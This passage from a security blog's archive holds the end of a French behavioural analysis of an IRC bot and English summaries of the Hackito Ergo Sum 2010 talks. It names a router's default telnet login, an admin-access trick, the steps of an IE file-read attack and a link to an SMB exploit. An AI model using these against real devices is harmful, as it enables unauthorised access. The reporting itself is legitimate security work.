<div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTSN5vvyjpVBx0WyQuRMIVCXXncDC-Mtn5B2CC-bhvZCd_Cii2wkQmYpDNjDvwa6F_SG6XFiTfBAzpGZDr2kVTX_B3pr-u8ZfUonPXiEFgG6pjgXM4hMo_T25-n4MhGixmoCRneCeG3Jik/s1600/network1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTSN5vvyjpVBx0WyQuRMIVCXXncDC-Mtn5B2CC-bhvZCd_Cii2wkQmYpDNjDvwa6F_SG6XFiTfBAzpGZDr2kVTX_B3pr-u8ZfUonPXiEFgG6pjgXM4hMo_T25-n4MhGixmoCRneCeG3Jik/s320/network1.png" /></span></a></div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Sur certains serveurs IRC auxquels il se connecte, une phase d'authentification a été mise en place grâce à la commande IRC "</span><i><span class="Apple-style-span" style="font-family: inherit;">PASS</span></i><span class="Apple-style-span" style="font-family: inherit;">". Après, le malware choisit un nickname au format suivant [CODE_PAYS|CODE_OS]NOMBRE_ALÉATOIRE. Pour mon cas un des nicknames fut : </span><i><span class="Apple-style-span" style="font-family: inherit;">[FRA|XP]5531626</span></i><span class="Apple-style-span" style="font-family: inherit;">, puis il se connecte au canal "</span><i><span class="Apple-style-span" style="font-family: inherit;">#dl#</span></i><span class="Apple-style-span" style="font-family: inherit;">". Ensuite, le malware reçoit à plusieurs reprises un message privé (PRIVMSG) envoyé par différents nicknames (botmasters) dont un fi2ani, contenant un lien vers d'autres fichiers exécutables situés sur des serveurs en Allemagne et aux Etats Unis (à Saint Louis et Chicago). </span></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div><div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIHSdD_6lmxTTeSdKe3S-FS3j95Ba5-T74-8jC6YdwaTueBnsV8lGVwH4Rv1Rc6JkH43BjZVKgNOKreXM43Sb_POVgcp079sBV-IPKVgPL7yBKpEdNUiB9v8ct3zWtv9a5RmPhHVonrtbl/s1600/network2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: inherit;"><img border="0" height="19" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIHSdD_6lmxTTeSdKe3S-FS3j95Ba5-T74-8jC6YdwaTueBnsV8lGVwH4Rv1Rc6JkH43BjZVKgNOKreXM43Sb_POVgcp079sBV-IPKVgPL7yBKpEdNUiB9v8ct3zWtv9a5RmPhHVonrtbl/s640/network2.png" width="640" /></span></a></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Un des liens déclenche le téléchargement d'un fichier exécutables situé sur un serveur web qui une fois enregistré dans le répertoire des fichiers temporaires du compte local, s'exécute et commence a exploiter ma VM. Il se connecte notamment à un second serveur IRC de contrôle (irc.nomdedomaine00.com, encore situé à Chicago) et télécharge d'autres fichiers exécutables. Lui aussi modifie le registre afin de s'autoriser auprès du pare-feu et de se lancer au démarrage grâce à l'ajout d'une valeur dans la clé de registre suivante : </span><i><span class="Apple-style-span" style="font-family: inherit;">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</span></i><span class="Apple-style-span" style="font-family: inherit;">.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><b><span class="Apple-style-span" style="font-family: inherit;"><span class="Apple-style-span" style="font-size: x-large;">3 - Remarques</span></span></b></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">J'ai testé ce malware au service VirusTotal pour avoir un aperçu des différents anti-virus reconnaissant ce fichier comme un malware, et à ma grande surprise seulement 10 des 41 testés identifient le fichier comme une menace potentielle. A ce jour, AntiVir, Avast, BitDefender, ClamAV, DrWeb, GData, Kaspersky, McAfee, Microsoft, Symantec, TrendMicro ne reconnaissent pas ce malware alors qu'ils sont très présent sur le marché des solutions antivirales, ce qui est relativement inquiétant. Si vous souhaitez accéder au rapport généré par VirusTotal, il y a un lien à la fin de l'article.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Il y a une chose que je n'ai pas comprise, c'est pourquoi l'autorisation au niveau du pare-feu est attribuée au fichier IMAGE.JPG.exe (fichier exécuté par l'utilisateur) alors qu'à chaque démarrage c'est le fichier secfil.exe qui est automatiquement exécuté. De plus, quand je rétablie les paramètres par défaut du pare-feu (donc IMAGE.JPG.exe n'a plus d'autorisation), la communication entre secfile.exe et les différents serveurs IRC est toujours possible. Si vous avez des réponses à mes questions, n'hésitez pas à laisser un commentaire, je vous en serais très reconnaissant. </span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><b><span class="Apple-style-span" style="font-family: inherit;"><span class="Apple-style-span" style="font-size: x-large;">4 - Conclusion</span></span></b></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Ce qu'il faut retenir de cette analyse comportementale c'est que les cybercriminels (je préfère utiliser ce mot plutôt que "pirates" car il est plus clair aux yeux de tous) rusent afin de piéger l'utilisateur qui, s'il n'est pas conscient des risques auxquels il est exposé sur Internet, sera une proie très facile. Ici, l'utilisation de l'ingénierie sociale (social engineering) pour répandre le malware de type "<i>bot</i>" en est un bon exemple. De plus, le nombre de serveurs utilisés et leur dispersion montrent à quel point ces cybercriminels sont organisés. Pendant cette phase d'analyse, je n'ai pas observé d'activité de propagation de la part du logiciel malveillant présent dans ma machine virtuelle. Les prochaines étapes seront (peut-être) l'analyse du code afin de mieux comprendre son fonctionnement et découvrir les techniques utilisées par les développeurs et l'analyse d'un des fichiers téléchargés par le malware.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: inherit;">Analyse du 04/05/2010 : </span><a class="vt-p" href="https://www.virustotal.com/analisis/5774689e29587e93094240532a28c2e39b508ad2238af793427badb8a8daedd7-1272983215"><span class="Apple-style-span" style="font-family: inherit;">https://www.virustotal.com/analisis/5774689e29587e93094240532a28c2e39b508ad2238af793427badb8a8daedd7-1272983215</span></a></div></div><div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: inherit;">Regshot : </span><a class="vt-p" href="http://sourceforge.net/projects/regshot/"><span class="Apple-style-span" style="font-family: inherit;">http://sourceforge.net/projects/regshot/</span></a></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Localiser une ip : </span><a class="vt-p" href="http://www.ip2location.com/"><span class="Apple-style-span" style="font-family: inherit;">http://www.ip2location.com/</span></a></div></div><div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div><div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div><div><span class="Apple-style-span" style="font-family: inherit;">Vidéo sur le même sujet (en anglais) :</span></div><div><span class="Apple-style-span" style="font-family: inherit;"><object height="300" width="400"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=9474345&server=vimeo.com&show_title=1&show_byline=1&show_portrait=1&color=&fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=9474345&server=vimeo.com&show_title=1&show_byline=1&show_portrait=1&color=&fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"></embed></object></span><br />
<a class="vt-p" href="http://vimeo.com/9474345"><span class="Apple-style-span" style="font-family: inherit;">Introduction to Malware Analysis</span></a><span class="Apple-style-span" style="font-family: inherit;"> from </span><a class="vt-p" href="http://vimeo.com/sansinstitute"><span class="Apple-style-span" style="font-family: inherit;">SANS Institute</span></a><span class="Apple-style-span" style="font-family: inherit;"> on </span><a class="vt-p" href="http://vimeo.com/"><span class="Apple-style-span" style="font-family: inherit;">Vimeo</span></a><span class="Apple-style-span" style="font-family: inherit;">.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-7082913599474591862010-04-16T21:52:00.003+02:002010-12-16T16:29:23.019+01:00Hackito Ergo Sum, Day 3<div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="http://lekernel.net/blog/wp-content/uploads/2010/03/hackito-300x210.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="140" src="http://lekernel.net/blog/wp-content/uploads/2010/03/hackito-300x210.jpg" width="200" /></a></div>The last day of HES has begun with a conference about <b>new generation of botnets</b> presented by <b>Itzik Kotler</b> and <b>Ziv Gadot</b> from Radware. According to their presentation, lots of technologies have been introduced by botnets so it's one reason why they are interested. Of course, botnets are also re-using technologies invited by researchers and others people. Botnet masters use different kinds of protocols to communicate with theirs botnets, for example HTTP (Twitter...), IRC or P2P network architecture can be used. If we analyse Conficker, we can see that in its 3 first versions (A, B, C), it was based on HTTP and random domain name to communicate. Last versions (D, E) was based on a more flexible communication way : the P2P.</div><div style="text-align: justify;">An important thing that a botnet master wants for his botnet is that it is SPOF (Single Point Of Failure) resilient. The utilization of protocols like HTTP permits to blend botnet traffic into the common traffic which will pass organization security policy, work behind NAT and minimize potential network footprint.</div><div style="text-align: justify;">Their aim was to do a blend botnet with SPOF resilience, so they have looked to communication methods which respond to this criteria :</div><div style="text-align: justify;">- Internet clipboard e.g. pastebin.com</div><div style="text-align: justify;">- Disposable E-mail Address (DEA)</div><div style="text-align: justify;">- User generated content e.g. comments on cnn.com</div><div style="text-align: justify;">- Url shortening e.g. tinyurl.com</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">They have introduced the "room concept" which correspond to the communication method. It's possible to use private room to communicate with one bot, this will send an unicast message. The negotiation of the room between the bot and the bot master is a 4 steps action, I advise you to look slides it's very well explained. Their proof of concept is written in python and is called Turbot (this name has no relation with the speed of their botnet, because at this moment it's quite slow). We didn't have a demonstration of their botnet POC because of a network problem at the conference. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FTurbot-A-Next-Generation-Botnet1.pdf">[Slides]</a></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"> After the lunch, <b>Renaud Lifchitz</b> has started the afternoon with a very interesting talk which was the first in french (2 others will follow). First, I will define "clock-skewing". This is a little clock variation in comparison to a reference clock. The aim is to create a footprint from clock-skewing (because all clock are different), so the measure precision is very important.<br />
A computer has 2 clocks :<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>- hardware clock (Real Time Clock)<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>- software/system clock managed by the OS</div><div style="text-align: justify;">Here, it's the second clock which is interesting. To measure clock-skewing, Renaud takes an interest in NTP protocol which contact atomic clock using UDP on port 123. According to the time difference between the atomic clock and the system clock, NTP will increase or slow down clock rate to put right the time (if time changements will be curt, some processes could be disturbed). NTP is the most precise method to measure time, but it's also possible by sniffing packets or by sending ICMP Timestamp request (Type 13, Code 0) and answer is ICMP Timestamp reply (Type 14) wich return number of millisecond after midnight. So Renaud has chosen NTP for its precision.<br />
These are steps to fingerprint a machine :<br />
- every 5 seconds, adjust the clock (of your computer) with a NTP server and save victim's timestamp<br />
- after 1 or 2 minutes, you will be able to have a precise fingerprint (which correspond to an average skew).<br />
<br />
<div style="text-align: center;"><i>"more imprecise is victim's clock, more precise is fingerprint"</i></div><div style="text-align: center;"><br />
</div>This method can be used to identify a stolen hardware on a LAN (even if IP address, MAC address and hard drive have changed it works, but not if operating system has changed), detect virtual machines (all VM can have the same clock than host machine) ... But there are some disadvantage with this method, it's imprecise on the Internet and results can be affected by network latency, temperature variation, altitude and victim's activity. To protect you against this fingerprint method, you can often sync your clock (every 5-10 seconds) and disabled TCP/ICMP Timestamp Request/Replies. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FHES2010-RLIFCHITZ-FINGERPRINTINGCLOCKSKEWING.pdf">[Slides]</a><br />
<br />
<br />
<br />
This talk has been followed by another french one named "<b>A5/1 application & crack via GPU</b>" and presented by <b>Gloire Gwendal</b> (Kalkulator’s Knights Project). He has presented the A5 protocol family :<br />
- A5/1 <a class="vt-p" href="http://en.wikipedia.org/wiki/A5/1">http://en.wikipedia.org/wiki/A5/1</a><br />
- A5/2 <a class="vt-p" href="http://en.wikipedia.org/wiki/A5/2">http://en.wikipedia.org/wiki/A5/2</a><br />
- A5/3 <a class="vt-p" href="http://en.wikipedia.org/wiki/A5/3">http://en.wikipedia.org/wiki/A5/3</a><br />
A5/1 is a weak encryption algorithm wich use only a 64 bits key in theory (and 54 in practice because 10 are fixed to zero). Because of its weakness, lots of researcher have tried to owned A5/1 :<br />
- 1997 : first attack, A5/1 complexity reduction<br />
- 1999 : publication of A5/1 which has been discovered by Reverse Engineering<br />
- 2000 : some complexity reductions<br />
- 2003-2004 : attacks on the key<br />
- december 2009 : Karsten Nohl announced his attack during the Chaos Computer Congress. It's a rainbow table attack which can be done in 30 minutes. A demonstration will be done in august 2010.<br />
There is few risks to see attacks on A5/1 in a near future, because a superpower calculation is needed (GPU cluster, FPGA cluster ...) and rainbow table generation needs some months. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FCracking-A5-1-with-GPGPU_eng.pdf">[Slides]</a><br />
<br />
<br />
Then <b>Julien Vanegue</b> from Microsoft has talked about "<b>Automated vulnerability analysis of zero-size heap allocations</b>" <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FHES10-jvanegue_zero-allocations.pdf">[Slides]</a> and this conference day ended with the conference "<b>Stack Smashing Protector in FreeBSD</b>" presented by <b>Paul Rascagneres</b> (in french). <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2Fssp-hes2010.pdf">[Slides]</a></div><div style="text-align: justify;"><br />
<br />
These 3 days at Hackito Ergo Sum in Paris was very interesting, I'm very happy to have assisted to these different talks and I think that I'll be present at HES2011. I want thank HES team for its work and I want to say : "<i>See you in 2011 ;)</i>".<br />
<br />
If you read some errors or want make some remarks, don't hesitate comments are here for that.<br />
<br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Turbot : <a class="vt-p" href="http://code.google.com/p/turbot/">http://code.google.com/p/turbot/</a><br />
<br />
</div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-30835329881609948972010-04-13T18:20:00.004+02:002010-12-16T16:28:17.451+01:00Hackito Ergo Sum, Day 2<div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="http://lekernel.net/blog/wp-content/uploads/2010/03/hackito-300x210.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: justify;"><img border="0" height="140" src="http://lekernel.net/blog/wp-content/uploads/2010/03/hackito-300x210.jpg" width="200" /></a></div><div style="text-align: justify;">The first speaker of the second day was <b>Jorge Luis Alvarez Medina</b> from Core Security. His talk was named "<b>Internet Explorer turns your personal computer into a public file server</b>" and it was the same theme that he has presented at the Black Hat DC 2010 (February 2-3th 2010). His talk explained how it is possible to blindly read every files (navigation history, cookies ...) on the victim's hard drive.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">He has begun by presenting security implementations of IE : security zones, zone elevation attack (a web page in a given security zone loads a page from a less restrictive zone) and MIME type detection. The simplest scenario he has described is the following :</div><div style="text-align: justify;">1- The attacker put a specific HTML file in the victim's shared folders</div><div style="text-align: justify;">2- The attacker send a link to a malicious site to the victim</div><div style="text-align: justify;">3- The malicious webpage redirects the navigation flow towards the uploaded file</div><div style="text-align: justify;">4- HTML/script code runs in the context of 127.0.0.1</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">He has continued with a demo with a BeEf module specially developed for this vulnerability. So if you want to protect your computer about this vulnerability, you can for example :</div><div style="text-align: justify;">- Set to high the security level of Internet and Intranet zones</div><div style="text-align: justify;">- Use Internet Explorer in Protected Mode</div><div style="text-align: justify;">- Disable administrative shares</div><div style="text-align: justify;">- Change your browser :)</div><div style="text-align: justify;"><a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FHES2010_Abusing_insecure_features_of_Internet_Explorer.pdf">[Slides]</a> <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FAbusing_insecure_features_of_Internet_Explorer.pdf">[Whitepaper]</a><br />
<br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><a class="vt-p" href="http://twitpic.com/1e914e" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;" title="Jonathan Brossard @ HES2010 on Twitpic"><img alt="Jonathan Brossard @ HES2010 on Twitpic" height="150" src="http://twitpic.com/show/thumb/1e914e.png" width="150" /></a>The last talk of the morning was presented by <b>Jonathan Brossard</b> from P1 Security and was entitled "<b>Breaking Virtualization by switching to Virtual 8086 mode</b>". He has begun his talk by the definition of virtualization and the presentation of the different kinds of it (full virtualization, paravirtualization). Then he has presented an overview of the different kinds of virtualization vulnerabilities like :<br />
- privilege escalation in a virtual machine<br />
- from one VM, attack an other VM<br />
- do a DOS attack on the host to disrupt VMs<br />
- inside a VM to access the host<br />
During his researchs, Jonathan has fuzzed Virtual Box in which he has found 2 bugs in the hypervisor and a bug concerning the guest machine in Virtual PC. He ended his presentation with a demonstration in which the exploitation of a bug he has found in vserver crash the host machine (his laptop in this case). <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FBreaking-virtualization-by-switching-to-Virtual-8086-mode_final.pdf">[Slides]</a></div><div style="text-align: justify;"><br />
</div><div class="separator" style="clear: both; text-align: justify;"></div><div style="text-align: justify;"></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">During the lunch time, I've assisted to the lockpicking workshop which was mainly based on practice. I've learned how to build lockpicks and I've successfully lockpicked one lock.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">The afternoon has begun with a conference of <b>Matthieu Suiche</b> from MoonSols about <b>Mac OS X Physical Memory Analysis</b>. He was talking about physical memory analysis on x86/x64 Intel processors macintosh (not PowerPC) running Mac OS 10.5 (Leopard) or 10.6 (Snow Leopard). Lots of informations can be found during analysis of memory like syscalls, processes, machine informations (minor & major OS version, kernel version) ... He is also able to found the password of an user account (used to log on his mac) just in analysing the memory. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FHES2010_MacOSX_devmem_analysis.pdf">[Slides]</a></div><div style="text-align: justify;"><br />
<br />
</div><div style="text-align: justify;">The next talk was presented by <b>Sandro Gauci</b> and was named "<b>Attacking VoIP – attacks and the attackers</b>". He has introduced the SIP, SIP scanning and tools like SIPVicious and VoiPPack for CANVAS. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2Fattacking-voip.pdf">[Slides]</a></div><div style="text-align: justify;"><br />
<br />
</div><div style="text-align: justify;">Then <b>Laurent Gaffié</b> has started his "<b>Fuzzing the SMB case</b>" conference by the presentation of this old protocol. His approach for his research was the following :</div><div style="text-align: justify;">- RFC, books and Microsoft documentation reading</div><div style="text-align: justify;">- Set a lab representing a company network with Windows 3.1 to Windows 7</div><div style="text-align: justify;">- Fuzz the different implementations of SMB</div><div style="text-align: justify;">During his demonstration, the bug discovered has permitted to him to cause a bluescreen from a remote pc in few seconds on a victim Windows 7 machine. At this moment, he's working with Microsoft teams to resolve this bug and it should be patched next Tuesday (MS10-020). He has also discovered lots of other bugs in Vista, XP, 7, 2008 Server, Samba and Netware 6.5 SP8. Because packets are very small, all these bugs have taken less than 2 minutes to be found by Laurent's tools. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FHackitoErgoSum-2010-Fuzzing-The-SMB-case-Presentation-v0-1e.pdf">[Slides]</a></div><div style="text-align: justify;"><br />
<br />
</div><div style="text-align: justify;"><b>Lutz Böhne</b> has presented the last talk of the second day which was entitled "<b>Peeking into Pandora’s Bochs: instrumenting a full system emulator to analyse malicious software</b>". Pandora’s Bochs is an automated unpacker written in python. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2F2010-04-09-Peeking-into-Pandoras-Bochs_RedTeam-Pentesting.pdf">[Slides]</a></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">BeEF : <a class="vt-p" href="http://www.bindshell.net/tools/beef/">http://www.bindshell.net/tools/beef/</a></div><div style="text-align: justify;">SIPVicious : <a class="vt-p" href="http://code.google.com/p/sipvicious/">http://code.google.com/p/sipvicious/</a><br />
MS10-020 : <a class="vt-p" href="http://www.microsoft.com/technet/security/Bulletin/MS10-020.mspx">http://www.microsoft.com/technet/security/Bulletin/MS10-020.mspx</a><br />
SMB bug infos : <a class="vt-p" href="http://seclists.org/fulldisclosure/2010/Apr/201">http://seclists.org/fulldisclosure/2010/Apr/201</a><br />
SMB exploit : <a class="vt-p" href="http://www.exploit-db.com/exploits/12273">http://www.exploit-db.com/exploits/12273</a><br />
<br />
</div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-9565837529490545062010-04-11T21:16:00.004+02:002012-05-12T20:55:54.817+02:00Hackito Ergo Sum, Day 1<div class="separator" style="clear: both; text-align: center;">
<a class="vt-p" href="http://lekernel.net/blog/wp-content/uploads/2010/03/hackito-300x210.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: justify;"><img border="0" height="140" src="http://lekernel.net/blog/wp-content/uploads/2010/03/hackito-300x210.jpg" width="200" /></a></div>
<div style="text-align: justify;">
Hackito Ergo Sum is a conference in IT security and hacking during 3 days in Paris. This year, it was the first edition of HES and it was from April 8th to 10th 2010. Between 50 and 70 of professionnal or passionnate people were present to assist to this event.</div>
<div style="text-align: justify;">
<br />
<br />
<br /></div>
<div style="text-align: justify;">
The first day began with <b>Jeremie Zimmerman</b> from "La quadrature du net" which is an organization which defense citizen rights and freedoms on the Internet. This organization have been founded in 2008 by 4-5 persons. They tell them "law hackers" i.e. they search incoherence in french and european laws. According to Jeremie, there is one Internet, but for example, in China, internet users aren't using the Internet but the "Chinternet" because of the censorship applied by the autorities (see the Tiananmen case). The second example that he has quoted was about mobile Internet. He said that's not the Internet because we can't use P2P, newsgroups and some operators decrease traffic rate.</div>
<div style="text-align: justify;">
<br />
<br /></div>
<div style="text-align: justify;">
The second talk of the morning was named "<b>Getting in the SS7 kingdom: hard technology and disturbingly easy hacks to get entry points in the walled garden</b>" and was presented by <b>Philippe Langlois</b> from P1 Security. SS7 (Signaling System 7) is a group of phone protocols which are used in most of phone network in the world. At the moment, pentests are very rare on phone networks, like on IP networks in the 80's but should increase in the next 10 years. It's possible to scan and inject on these networks, for exemple we can use SCTPscan tool (developed by Philippe and included in Backtrack 4) to scan SCTP equipments. SCTP (Stream Control Transmission Protocol) is a protocol of transport layer of the OSI model like UDP or TCP protocols. To scan a SCTP equipment, we need to send an "INIT" packet. If the port is closed, it replies by an "ABORT", otherwise it replies with an "INIT-ACK" for a legitimate client and it doesn't reply to the attaquer. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FAttacking-SS7-2010-Philipe-Langlois-P1security-HES-v10.pdf">[Slides]</a></div>
<div style="text-align: justify;">
<br />
<br /></div>
<div style="text-align: justify;">
The afternoon began by a conference about the <b>FPGA security challenge</b>. <b>Sebastien Bourdeauducq</b> aka lekernel has briefly explained what is FPGA and then talked about the challenge which was available during the 3 days of HES 2010. If you need more informations on FPGA, I recommend you to go on Wikipedia. The challenge was composed of 6 levels with an incrementation of the difficulty level. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FFPGA-Challenge-Sebastien-Bourdeauducq.pdf">[Slides]</a></div>
<div style="text-align: justify;">
<br />
<br /></div>
<div style="text-align: justify;">
The conference following the Sebastien one's was presented by <b>Benjamin Henrion</b>. He has talked about the modifying/hacking of one of the most widespread Linux equipement in Belgium : the Belgacom Box 2. This box is made by Sagem and have a similar hardware with Orange's Livebox. It runs an OpenRG Linux and is equipped of a VDSL interface, VoIP and an Atheros card. By default, telnet is opened and a default combinaison of login/password is used (admin/BGCVDSL2). He has also found a method to have a full admin access on the web interface just by putting login and password in the url as GET parameters. It is possible to load custom code on it, via USB key, telnet or tftp. For example, Benjamin has successfully transformed his box in a torrent box with Transmission with cli and web access, and has installed tools like Tcpdump and Airodump ... <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2Fbbox2-hes2010.pdf">[Slides]</a></div>
<div style="text-align: justify;">
<br />
<br /></div>
<div style="text-align: justify;">
The third conference of the afternoon was about the <b>utilization of artificial intelligence techniques to improve pentesting automation</b>. The author of this talk, <b>Carlos Sarraute</b>, came directly from Argentina and works in Core Security, editor of the penetration testing product Core Impact. His talk has begun by a quick overview of pentests frameworks, the evolution of pentests and the description of an attack planning. He has talked about the PDDL (Planning Domain Description Language) and how we can use AI for pentests. For example, we can use different object types (host, network, port ...) and use predicates like TCP connectivity ... <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FHES2010_Sarraute_Using_AI_Techniques_to_improve_Pentesting_Automation.pdf">[Slides]</a></div>
<div style="text-align: justify;">
<br />
<br /></div>
<div style="text-align: justify;">
The last conference of this day was entitled "<b>Evolution of Microsoft security mitigations</b>" and was presented by <b>Tim Burrell</b> from Microsoft. Because I haven't assisted to it, I can't present you this talk. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FHES2010_Evolution_Of_Microsofts_Mitigations.pdf">[Slides]</a></div>
<div style="text-align: justify;">
<br />
<br /></div>
<div style="text-align: justify;">
All comments about what I've written are welcome.</div>
<div style="text-align: justify;">
<br />
<br /></div>
<div style="text-align: justify;">
Conference's Website : <a class="vt-p" href="http://hackitoergosum.org/">http://hackitoergosum.org/</a></div>
<div style="text-align: justify;">
HES Twitter : <a class="vt-p" href="http://twitter.com/HackitoErgoSum">http://twitter.com/HackitoErgoSum</a></div>
<div style="text-align: justify;">
Videos : <a class="vt-p" href="http://www.livestream.com/hackitoergosum">http://www.livestream.com/hackitoergosum</a></div>
<div style="text-align: justify;">
SCTPscan : <a class="vt-p" href="http://www.p1sec.com/corp/research/tools/sctpscan/">http://www.p1sec.com/corp/research/tools/sctpscan/</a></div>
<div style="text-align: justify;">
FPGA : <a class="vt-p" href="http://en.wikipedia.org/wiki/Fpga">http://en.wikipedia.org/wiki/Fpga</a></div>
<div style="text-align: justify;">
FPGA security challenge : <a class="vt-p" href="http://lekernel.net/blog/?p=975">http://lekernel.net/blog/?p=975</a><br />
